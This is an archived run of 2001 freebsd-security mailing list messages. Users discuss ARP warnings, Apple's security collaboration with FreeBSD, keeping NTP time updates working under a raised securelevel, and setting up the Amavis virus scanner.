=C0=CC=C0=AF=B7=CE =C0=FC=BC=DB =BD=C7=C6=D0=C7=DF=BD=C0=B4=CF=B4=D9. =20 --------------------------------------------=20 =20 =BC=F6=BD=C5=C0=DA=C0=C7 =B8=DE=C0=CF =BA=B8=B0=FC = =BF=EB=B7=AE=C0=CC =B0=A1=B5=E6=C2=F7 =C0=D6=BD=C0=B4=CF=B4=D9. = =B3=AA=C1=DF=BF=A1 =B4=D9=BD=C3 =BD=C3=B5=B5=C7=CF=BD=CA=BD=C3=BF=C0. =20 =20 --------------------------------------------=20 ------=_NextPart_000_0017_01C0E3BF.AAD63E80 Content-Type: text/html; charset="euc-kr" Content-Transfer-Encoding: quoted-printable =B3=D7=C0=CC=B9=F6 =B8=DE=C0=CF
please take this e-mail off of = the=20 list
thank you
 
----- Original Message -----
From:=20 NAVER-MAILER@naver.com =
Sent: Wednesday, May 23, 2001 = 7:16=20 PM
Subject: =B8=DE=C0=CF = =C0=FC=BC=DB =BD=C7=C6=D0 =BE=CB=B8=B2 <netbuilder@naver.com>


 = ------=_NextPart_000_0017_01C0E3BF.AAD63E80-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed May 23 17: 0:26 2001 Delivered-To: freebsd-security@freebsd.org Received: from mail.ipfw.org (cr308584-a.wlfdle1.on.wave.home.com [24.114.52.208]) by hub.freebsd.org (Postfix) with ESMTP id 7B8CB37B422 for ; Wed, 23 May 2001 17:00:24 -0700 (PDT) (envelope-from pccb@yahoo.com) Received: from apollo (apollo.objtech.com [192.168.111.5]) by mail.ipfw.org (Postfix) with ESMTP id 5D6913134; Wed, 23 May 2001 20:00:17 -0400 (EDT) Date: Wed, 23 May 2001 20:00:17 -0400 From: Peter Chiu X-Mailer: The Bat! (v1.52) Reply-To: Peter Chiu X-Priority: 3 (Normal) Message-ID: <12368087094.20010523200017@ipfw.org> To: mudman Cc: freebsd-security@freebsd.org Subject: Re: service attacks In-Reply-To: References: MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Hello mudman, Wednesday, May 23, 2001, 6:24:55 PM, you wrote: m> I'm somewhat of a greenhorn on how packets are handled in FreeBSD. m> Apparently, some character has been throwing some bad packets at me. m> Kernel message like: m> arp: bad hardware address format (0x800) Can you describe your environment? I am on cable and I got these messages once or twice per day. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed May 23 17:17:31 2001 Delivered-To: freebsd-security@freebsd.org Received: from cage.simianscience.com (cage.simianscience.com [64.7.134.1]) by hub.freebsd.org (Postfix) with ESMTP id 071A337B423 for ; Wed, 23 May 2001 17:17:26 -0700 (PDT) (envelope-from mike@sentex.net) Received: (from root@localhost) by cage.simianscience.com (8.11.3/8.11.2) id f4O0HPb11818 for freebsd-security@freebsd.org; Wed, 23 May 2001 20:17:25 -0400 (EDT) (envelope-from mike@sentex.net) Received: from chimp (fcage [192.168.0.2]) by cage.simianscience.com (8.11.3/8.11.2av) with ESMTP id f4O0HLV11810 for ; Wed, 23 May 2001 20:17:21 -0400 (EDT) (envelope-from mike@sentex.net) Message-Id: <4.2.2.20010523201612.01aa97e0@192.168.0.12> X-Sender: mdtancsa@192.168.0.12 X-Mailer: QUALCOMM Windows Eudora Pro Version 4.2.2 Date: Wed, 23 May 2001 20:17:20 -0400 To: freebsd-security@freebsd.org From: Mike Tancsa Subject: Re: Apple and FreeBSD Security Collaboration In-Reply-To: <20010523163407.A77156@mighty.grot.org> Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii"; format=flowed X-Virus-Scanned: by AMaViS perl-10 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org I hate to be so cynical and not accept it at face value, but is it true ? Do they really work closely with the security officer(s) ? ---Mike At 04:34 PM 5/23/2001 -0700, R.P. Aditya wrote: >Add another feather to the cap of FreeBSD: > >From > > http://www.apple.com/support/security/security.html > >Collaboration with other security groups >... >Apple also works very closely with the FreeBSD Security team to analyze and >release patches for security vulnerabilities. > > >To Unsubscribe: send mail to majordomo@FreeBSD.org >with "unsubscribe freebsd-security" in the body of the message -------------------------------------------------------------------- Mike Tancsa, tel +1 519 651 3400 Network Administration, mike@sentex.net Sentex Communications www.sentex.net Cambridge, Ontario Canada www.sentex.net/mike To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed May 23 19:31: 3 2001 Delivered-To: freebsd-security@freebsd.org Received: from tomts5-srv.bellnexxia.net (tomts5.bellnexxia.net [209.226.175.25]) by hub.freebsd.org (Postfix) with ESMTP id 43C5A37B422 for ; Wed, 23 May 2001 19:30:59 -0700 (PDT) (envelope-from glassfish@glassfish.net) Received: from frogbox.glassfish.net ([64.230.29.112]) by tomts5-srv.bellnexxia.net (InterMail vM.4.01.03.16 201-229-121-116-20010115) with SMTP id <20010524023056.LPEO27183.tomts5-srv.bellnexxia.net@frogbox.glassfish.net> for ; Wed, 23 May 2001 22:30:56 -0400 Received: (qmail 18756 invoked from network); 24 May 2001 02:33:46 -0000 Received: from unknown (HELO MAINWS) (192.0.0.20) by 192.0.0.4 with SMTP; 24 May 2001 02:33:46 -0000 From: "Michael Tang Helmeste" To: Subject: setting time without changing securelevel Date: Wed, 23 May 2001 22:29:54 -0400 Message-ID: MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 (Normal) X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook IMO, Build 9.0.2416 (9.0.2910.0) Importance: Normal X-MimeOLE: Produced By Microsoft MimeOLE V5.00.3018.1300 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Is there any way to allow NTP to set my time without changing my securelevel? I run NTP through cron, but whenever it tries to change the clock, FreeBSD just changes it back to what it was before. I don't want to have to run at a lower securelevel, but only to allow changing the time. Is this possible? Thanks. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed May 23 22:28:53 2001 Delivered-To: freebsd-security@freebsd.org Received: from sbtx.tmn.ru (sbtx.tmn.ru [212.76.160.49]) by hub.freebsd.org (Postfix) with ESMTP id 2CA3737B423 for ; Wed, 23 May 2001 22:28:50 -0700 (PDT) (envelope-from serg@sbtx.tmn.ru) Received: from sv.tech.sibitex.tmn.ru (sv.tech.sibitex.tmn.ru [212.76.160.59]) by sbtx.tmn.ru (8.11.3/8.11.3) with ESMTP id f4O5SgI38971; Thu, 24 May 2001 11:28:42 +0600 (YEKST) (envelope-from serg@sbtx.tmn.ru) Received: (from serg@localhost) by sv.tech.sibitex.tmn.ru (8.11.3/8.11.3) id f4O5SgZ33434; Thu, 24 May 2001 11:28:42 +0600 (YEKST) (envelope-from serg) Date: Thu, 24 May 2001 11:28:42 +0600 From: "Sergey N. Voronkov" To: Michael Tang Helmeste Cc: freebsd-security@FreeBSD.ORG Subject: Re: setting time without changing securelevel Message-ID: <20010524112842.A33408@sv.tech.sibitex.tmn.ru> References: Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: ; from glassfish@frogbox.dyndns.org on Wed, May 23, 2001 at 10:29:54PM -0400 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On Wed, May 23, 2001 at 10:29:54PM -0400, Michael Tang Helmeste wrote: > Is there any way to allow NTP to set my time without changing my > securelevel? I run NTP through cron, but whenever it tries to change the > clock, FreeBSD just changes it back to what it was before. I don't want to > have to run at a lower securelevel, but only to allow changing the time. Is > this possible? Thanks. > ntpd -x ? [from man ntpd] -x Ordinarily, if the time is to be adjusted more than 128 ms, it is stepped, not gradually slewed. This option forces the time to be slewed in all cases. Note: since the slew rate is limited to 0.5 ms/s, each second of adjustment requires an amortization interval of 2000 s. Thus, an adjustment of many seconds can take hours or days to amortize. Bye, Serg. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu May 24 0:22:48 2001 Delivered-To: freebsd-security@freebsd.org Received: from fledge.watson.org (fledge.watson.org [204.156.12.50]) by hub.freebsd.org (Postfix) with ESMTP id A763937B422 for ; Thu, 24 May 2001 00:22:43 -0700 (PDT) (envelope-from arr@watson.org) Received: from localhost (arr@localhost) by fledge.watson.org (8.11.3/8.11.3) with SMTP id f4O7MRv20442; Thu, 24 May 2001 03:22:27 -0400 (EDT) (envelope-from arr@watson.org) Date: Thu, 24 May 2001 03:22:26 -0400 (EDT) From: "Andrew R. Reiter" To: "R.P. Aditya" Cc: freebsd-security@FreeBSD.ORG Subject: Re: Apple and FreeBSD Security Collaboration In-Reply-To: <20010523163407.A77156@mighty.grot.org> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Let's hope they fix a number of vulns in their own code as well :-/ On Wed, 23 May 2001, R.P. Aditya wrote: > Add another feather to the cap of FreeBSD: > > From > > http://www.apple.com/support/security/security.html > > Collaboration with other security groups > ... > Apple also works very closely with the FreeBSD Security team to analyze and > release patches for security vulnerabilities. > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message > *-------------................................................. | Andrew R. Reiter | arr@fledge.watson.org | "It requires a very unusual mind | to undertake the analysis of the obvious" -- A.N. Whitehead To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu May 24 4:58: 9 2001 Delivered-To: freebsd-security@freebsd.org Received: from jamus.xpert.com (jamus.xpert.com [199.203.132.17]) by hub.freebsd.org (Postfix) with ESMTP id E875437B424 for ; Thu, 24 May 2001 04:58:04 -0700 (PDT) (envelope-from roman@xpert.com) Received: from roman (helo=localhost) by jamus.xpert.com with local-esmtp (Exim 3.13 #1) id 152tkt-0006Rv-00; Thu, 24 May 2001 14:58:15 +0300 Date: Thu, 24 May 2001 14:58:15 +0300 (IDT) From: Roman Shterenzon To: John Braun Cc: Subject: Re: Problems with Amavis setup In-Reply-To: <20010508135942.70161.qmail@web13804.mail.yahoo.com> Message-ID: Organization: Xpert UNIX Systems Ltd. MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org I'm reading this mailling list with some delay, and perhaps people already answered your question, but as a maintainer of amavis-perl I did small change to amavis to work even with file(1) which doesn't have -b. The port is available since December via /usr/ports/security/amavis-perl I need to take a look if it needs upgrading. On Tue, 8 May 2001, John Braun wrote: > Ofcourse, FreeBSD has this command, but > Amavis requires command file with option -b. > If I don't mistake in version 4.1. hasn't this > option. > > Where can I get source or package for this command? > > Or someone know howto install Amavis without 'file > -b'? > > > --- Peter Pentchev wrote: > > On Tue, May 08, 2001 at 02:40:02AM -0700, John Braun > > wrote: > > > Hi! > > > > > > I can't download "file" command for "Amavis" from > > > > > > ftp://ftp.astron.com/pub/file/, > > > ftp://ftp.gw.com/pub/unix/file/ and > > > ftp://ftp.funet.fi/pub/unix/tools/file/. > > > > > > Where can I get this command ? > > > > The 'file' command is part of FreeBSD; it is > > installed as part of > > the FreeBSD installation. Look for it in /usr/bin. > > If Amavis > > cannot execute the 'file' command, make sure it has > > /usr/bin in > > its path. > > > > G'luck, > > Peter > > > > -- > > This sentence no verb. > > > __________________________________________________ > Do You Yahoo!? > Yahoo! Auctions - buy the things you want at great prices > http://auctions.yahoo.com/ > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message > --Roman Shterenzon, UNIX System Administrator and Consultant [ Xpert UNIX Systems Ltd., Herzlia, Israel. Tel: +972-9-9522361 ] To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu May 24 5:13:38 2001 Delivered-To: freebsd-security@freebsd.org Received: from web13804.mail.yahoo.com (web13804.mail.yahoo.com [216.136.175.14]) by hub.freebsd.org (Postfix) with SMTP id C099437B423 for ; Thu, 24 May 2001 05:13:32 -0700 (PDT) (envelope-from uktests@yahoo.com) Message-ID: <20010524121332.56295.qmail@web13804.mail.yahoo.com> Received: from [159.148.130.2] by web13804.mail.yahoo.com; Thu, 24 May 2001 05:13:32 PDT Date: Thu, 24 May 2001 05:13:32 -0700 (PDT) From: John Braun Subject: Re: Problems with Amavis setup To: Roman Shterenzon Cc: freebsd-security@freebsd.org In-Reply-To: MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org As a maintainer, which antiviruss scanner You can recommend to use with Amavis? --- Roman Shterenzon wrote: > I'm reading this mailling list with some delay, and > perhaps people already > answered your question, but as a maintainer of > amavis-perl I did small > change to amavis to work even with file(1) which > doesn't have -b. > The port is available since December via > /usr/ports/security/amavis-perl > > I need to take a look if it needs upgrading. > > On Tue, 8 May 2001, John Braun wrote: > > > Ofcourse, FreeBSD has this command, but > > Amavis requires command file with option -b. > > If I don't mistake in version 4.1. hasn't this > > option. > > > > Where can I get source or package for this > command? > > > > Or someone know howto install Amavis without 'file > > -b'? > > > > > > --- Peter Pentchev wrote: > > > On Tue, May 08, 2001 at 02:40:02AM -0700, John > Braun > > > wrote: > > > > Hi! > > > > > > > > I can't download "file" command for "Amavis" > from > > > > > > > > ftp://ftp.astron.com/pub/file/, > > > > ftp://ftp.gw.com/pub/unix/file/ and > > > > ftp://ftp.funet.fi/pub/unix/tools/file/. > > > > > > > > Where can I get this command ? > > > > > > The 'file' command is part of FreeBSD; it is > > > installed as part of > > > the FreeBSD installation. Look for it in > /usr/bin. > > > If Amavis > > > cannot execute the 'file' command, make sure it > has > > > /usr/bin in > > > its path. > > > > > > G'luck, > > > Peter > > > > > > -- > > > This sentence no verb. > > > > > > __________________________________________________ > > Do You Yahoo!? > > Yahoo! Auctions - buy the things you want at great > prices > > http://auctions.yahoo.com/ > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > > with "unsubscribe freebsd-security" in the body of > the message > > > > --Roman Shterenzon, UNIX System Administrator and > Consultant > [ Xpert UNIX Systems Ltd., Herzlia, Israel. Tel: > +972-9-9522361 ] > __________________________________________________ Do You Yahoo!? Yahoo! Auctions - buy the things you want at great prices http://auctions.yahoo.com/ To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu May 24 7:30:27 2001 Delivered-To: freebsd-security@freebsd.org Received: from mail.wlcg.com (mail.wlcg.com [207.226.17.4]) by hub.freebsd.org (Postfix) with ESMTP id 4FDB537B424 for ; Thu, 24 May 2001 07:30:24 -0700 (PDT) (envelope-from rsimmons@wlcg.com) Received: from localhost (rsimmons@localhost) by mail.wlcg.com (8.11.3/8.11.3) with ESMTP id f4OEUHx24465; Thu, 24 May 2001 10:30:20 -0400 (EDT) (envelope-from rsimmons@wlcg.com) Date: Thu, 24 May 2001 10:30:13 -0400 (EDT) From: Rob Simmons To: Michael Tang Helmeste Cc: freebsd-security@FreeBSD.ORG Subject: Re: setting time without changing securelevel In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org -----BEGIN PGP SIGNED MESSAGE----- Hash: RIPEMD160 If you set the time at boot by adding ntpdate_enable="YES" to /etc/rc.conf and you set ntp to adjust the time frequently enough, it won't adjust the clock by more than the 1 second restriction. Robert Simmons Systems Administrator http://www.wlcg.com/ On Wed, 23 May 2001, Michael Tang Helmeste wrote: > Is there any way to allow NTP to set my time without changing my > securelevel? I run NTP through cron, but whenever it tries to change the > clock, FreeBSD just changes it back to what it was before. I don't want to > have to run at a lower securelevel, but only to allow changing the time. Is > this possible? Thanks. > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message > -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.5 (FreeBSD) Comment: For info see http://www.gnupg.org iD8DBQE7DRr5v8Bofna59hYRA6axAJsHVlrpuD/vpePeR2et6Jokl0cSqACffieb 8IaIVGMCrBHYsIdMfzL6BVI= =jc+8 -----END PGP SIGNATURE----- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu May 24 7:45:35 2001 Delivered-To: freebsd-security@freebsd.org Received: from veldy.net (w028.z064001117.msp-mn.dsl.cnc.net [64.1.117.28]) by hub.freebsd.org (Postfix) with ESMTP id 2034E37B424 for ; Thu, 24 May 2001 07:45:27 -0700 (PDT) (envelope-from veldy@veldy.net) Received: from HP2500B (fuggle.veldy.net [64.1.117.28]) by veldy.net (Postfix) with SMTP id D85A2BA40; Thu, 24 May 2001 09:45:23 -0500 (CDT) Message-ID: <002001c0e45f$f1eb4e50$3028680a@tgt.com> From: "Thomas T. Veldhouse" To: "Rob Simmons" , References: Subject: Re: setting time without changing securelevel Date: Thu, 24 May 2001 09:43:48 -0500 MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 5.50.4522.1200 X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4522.1200 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org You probably shouldn't run it through cron. Especially if you are running a database on your machine. You probably want to run ntpd (via xntpd_enable knob). It is not hard to setup, but the documentation [that is readable] is scarce. Tom Veldhouse veldy@veldy.net ----- Original Message ----- From: "Rob Simmons" To: "Michael Tang Helmeste" Cc: Sent: Thursday, May 24, 2001 9:30 AM Subject: Re: setting time without changing securelevel > -----BEGIN PGP SIGNED MESSAGE----- > Hash: RIPEMD160 > > If you set the time at boot by adding ntpdate_enable="YES" to /etc/rc.conf > and you set ntp to adjust the time frequently enough, it won't adjust the > clock by more than the 1 second restriction. > > Robert Simmons > Systems Administrator > http://www.wlcg.com/ > > On Wed, 23 May 2001, Michael Tang Helmeste wrote: > > > Is there any way to allow NTP to set my time without changing my > > securelevel? I run NTP through cron, but whenever it tries to change the > > clock, FreeBSD just changes it back to what it was before. I don't want to > > have to run at a lower securelevel, but only to allow changing the time. Is > > this possible? Thanks. > > > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > > with "unsubscribe freebsd-security" in the body of the message > > > -----BEGIN PGP SIGNATURE----- > Version: GnuPG v1.0.5 (FreeBSD) > Comment: For info see http://www.gnupg.org > > iD8DBQE7DRr5v8Bofna59hYRA6axAJsHVlrpuD/vpePeR2et6Jokl0cSqACffieb > 8IaIVGMCrBHYsIdMfzL6BVI= > =jc+8 > -----END PGP SIGNATURE----- > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu May 24 11:28: 7 2001 Delivered-To: freebsd-security@freebsd.org Received: from obsecurity.dyndns.org (adsl-63-207-60-39.dsl.lsan03.pacbell.net [63.207.60.39]) by hub.freebsd.org (Postfix) with ESMTP id 9C9E537B423 for ; Thu, 24 May 2001 11:28:03 -0700 (PDT) (envelope-from kris@obsecurity.org) Received: by obsecurity.dyndns.org (Postfix, from userid 1000) id 3648D66B5F; Thu, 24 May 2001 11:28:03 -0700 (PDT) Date: Thu, 24 May 2001 11:28:03 -0700 From: Kris Kennaway To: Mike Tancsa Cc: freebsd-security@FreeBSD.ORG Subject: Re: Apple and FreeBSD Security Collaboration Message-ID: <20010524112803.F31151@xor.obsecurity.org> References: <20010523163407.A77156@mighty.grot.org> <4.2.2.20010523201612.01aa97e0@192.168.0.12> Mime-Version: 1.0 Content-Type: multipart/signed; micalg=pgp-md5; protocol="application/pgp-signature"; boundary="tmoQ0UElFV5VgXgH" Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <4.2.2.20010523201612.01aa97e0@192.168.0.12>; from mike@sentex.net on Wed, May 23, 2001 at 08:17:20PM -0400 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org --tmoQ0UElFV5VgXgH Content-Type: text/plain; charset=us-ascii Content-Disposition: inline Content-Transfer-Encoding: quoted-printable On Wed, May 23, 2001 at 08:17:20PM -0400, Mike Tancsa wrote: >=20 > I hate to be so cynical and not accept it at face value, but is it true ?= =20 > Do they really work closely with the security officer(s) ? Yes, we have a shared mailing list and pass on things like advisory drafts and vulnerability information reported to us. Kris --tmoQ0UElFV5VgXgH Content-Type: application/pgp-signature Content-Disposition: inline -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.5 (FreeBSD) Comment: For info see http://www.gnupg.org iD8DBQE7DVKyWry0BWjoQKURAvweAKDcSoCDDgmghRshmZ5+/Wxsty/+IwCgiC3a 1l/JA4usrzAiiF0zZngmUMI= =S+AC -----END PGP SIGNATURE----- --tmoQ0UElFV5VgXgH-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu May 24 12:25:18 2001 Delivered-To: freebsd-security@freebsd.org Received: from host213-123-129-85.btopenworld.com (host213-123-129-85.btopenworld.com [213.123.129.85]) by hub.freebsd.org (Postfix) with ESMTP id 96AEE37B423 for ; Thu, 24 May 2001 12:25:11 -0700 (PDT) (envelope-from dominic@host213-123-129-85.btopenworld.com) Received: (from dominic@localhost) by host213-123-129-85.btopenworld.com (8.11.3/8.11.3) id f4OJP7K00758; Thu, 24 May 2001 20:25:07 +0100 (BST) (envelope-from dominic) Date: Thu, 24 May 2001 20:25:06 +0100 From: Dominic Marks To: "Thomas T. Veldhouse" Cc: freebsd-security@freebsd.org Subject: Re: setting time without changing securelevel Message-ID: <20010524202506.B466@apollo> References: <002001c0e45f$f1eb4e50$3028680a@tgt.com> Mime-Version: 1.0 Content-Type: multipart/signed; micalg=pgp-md5; protocol="application/pgp-signature"; boundary="opJtzjQTFsWo+cga" Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <002001c0e45f$f1eb4e50$3028680a@tgt.com>; from veldy@veldy.net on Thu, May 24, 2001 at 09:43:48AM -0500 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org --opJtzjQTFsWo+cga Content-Type: text/plain; charset=us-ascii Content-Disposition: inline Content-Transfer-Encoding: quoted-printable Hello, On Thu, May 24, 2001 at 09:43:48AM -0500, Thomas T. Veldhouse wrote: > knob). It is not hard to setup, but the documentation [that is readable]= is > scarce. >=20 > Tom Veldhouse > veldy@veldy.net I suggest: http://freebsddiary.org/xntpd.html One problem I had was having to create an /etc/localtime as there wasn't one on the machine to begin with. Symlinking it to my city in /usr/share/zoneinfo/etc/etc works great in combination with the processes described in the above article. --=20 Dominic Marks Don't talk to me about Naval tradition.=20 It's nothing but rum, sodomy and the lash." -- Winston Churchill --opJtzjQTFsWo+cga Content-Type: application/pgp-signature Content-Disposition: inline -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.4 (FreeBSD) Comment: For info see http://www.gnupg.org iD8DBQE7DWAR5FwHMNbbKFkRAsQ9AJ9NpZ0cHDEEfkNnAKXUyXNrS6ZjugCfaoZQ ZbQuO1+C4xCe41+BYVVOmLM= =isMX -----END PGP SIGNATURE----- --opJtzjQTFsWo+cga-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu May 24 12:33:18 2001 Delivered-To: freebsd-security@freebsd.org Received: from veldy.net (w028.z064001117.msp-mn.dsl.cnc.net [64.1.117.28]) by hub.freebsd.org (Postfix) with ESMTP id B86AD37B424 for ; Thu, 24 May 2001 12:33:12 -0700 (PDT) (envelope-from veldy@veldy.net) Received: from HP2500B (fuggle.veldy.net [64.1.117.28]) by veldy.net (Postfix) with SMTP id B8C1CBA40; Thu, 24 May 2001 14:33:11 -0500 (CDT) Message-ID: <006b01c0e488$25f12620$3028680a@tgt.com> From: "Thomas T. Veldhouse" To: "Dominic Marks" Cc: References: <002001c0e45f$f1eb4e50$3028680a@tgt.com> <20010524202506.B466@apollo> Subject: Re: setting time without changing securelevel Date: Thu, 24 May 2001 14:31:36 -0500 MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 5.50.4522.1200 X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4522.1200 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org I found a similar article myself (I don't remember the URL though). I have had it running for quite some time (well -- a week or so). I didn't see that it recommends you use more than one server to sychronize with. I am currently using 4 public servers. That looks like a pretty decent article. It, like the rest, fail to inform you how to run your new server as a time server for the rest of your network. I can ntptrace ot it on the local machine, but it won't respond to other clients on my LAN. Tom Veldhouse veldy@veldy.net ----- Original Message ----- From: "Dominic Marks" To: "Thomas T. Veldhouse" Cc: Sent: Thursday, May 24, 2001 2:25 PM Subject: Re: setting time without changing securelevel Hello, On Thu, May 24, 2001 at 09:43:48AM -0500, Thomas T. Veldhouse wrote: > knob). It is not hard to setup, but the documentation [that is readable] is > scarce. > > Tom Veldhouse > veldy@veldy.net I suggest: http://freebsddiary.org/xntpd.html One problem I had was having to create an /etc/localtime as there wasn't one on the machine to begin with. Symlinking it to my city in /usr/share/zoneinfo/etc/etc works great in combination with the processes described in the above article. -- Dominic Marks Don't talk to me about Naval tradition. It's nothing but rum, sodomy and the lash." -- Winston Churchill To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu May 24 12:33:54 2001 Delivered-To: freebsd-security@freebsd.org Received: from imr2.ericy.com (imr2.ericy.com [12.34.240.68]) by hub.freebsd.org (Postfix) with ESMTP id 1262637B422 for ; Thu, 24 May 2001 12:33:50 -0700 (PDT) (envelope-from Antoine.Beaupre@ericsson.ca) Received: from mr6.exu.ericsson.se (mr6att.ericy.com [138.85.92.14]) by imr2.ericy.com (8.11.3/8.11.3) with ESMTP id f4OJVA818964; Thu, 24 May 2001 14:31:10 -0500 (CDT) Received: from noah.lmc.ericsson.se (noah.lmc.ericsson.se [142.133.1.1]) by mr6.exu.ericsson.se (8.11.3/8.11.3) with ESMTP id f4OJV9G01202; Thu, 24 May 2001 14:31:09 -0500 (CDT) Received: from lmc35.lmc.ericsson.se (lmc35.lmc.ericsson.se [142.133.16.175]) by noah.lmc.ericsson.se (8.11.2/8.9.2) with ESMTP id f4OJV8G16289; Thu, 24 May 2001 15:31:09 -0400 (EDT) Received: by lmc35.lmc.ericsson.se with Internet Mail Service (5.5.2653.19) id ; Thu, 24 May 2001 15:31:07 -0400 Received: from lmc.ericsson.se (lmcpc100455.pc.lmc.ericsson.se [142.133.23.150]) by LMC37.lmc.ericsson.se with SMTP (Microsoft Exchange Internet Mail Service Version 5.5.2653.13) id LSDSC5LC; Thu, 24 May 2001 15:31:02 -0400 From: "Antoine Beaupre (LMC)" To: Dominic Marks Cc: "Thomas T. Veldhouse" , freebsd-security@FreeBSD.ORG Message-ID: <3B0D6174.D95D5FD9@lmc.ericsson.se> Date: Thu, 24 May 2001 15:31:00 -0400 Organization: LMC, Ericsson Research Canada X-Mailer: Mozilla 4.7 [en]C-CCK-MCD (WinNT; U) X-Accept-Language: en,fr-CA,fr MIME-Version: 1.0 Subject: Re: setting time without changing securelevel References: <002001c0e45f$f1eb4e50$3028680a@tgt.com> <20010524202506.B466@apollo> Content-Type: text/plain; charset=iso-8859-1 Content-Transfer-Encoding: 8bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Dominic Marks wrote: > > Hello, > > I suggest: http://freebsddiary.org/xntpd.html > > One problem I had was having to create an /etc/localtime as there > wasn't one on the machine to begin with. Symlinking it to my city > in /usr/share/zoneinfo/etc/etc works great in combination with the > processes described in the above article. sysinstall can also do this for you. A. -- La sémantique est la gravité de 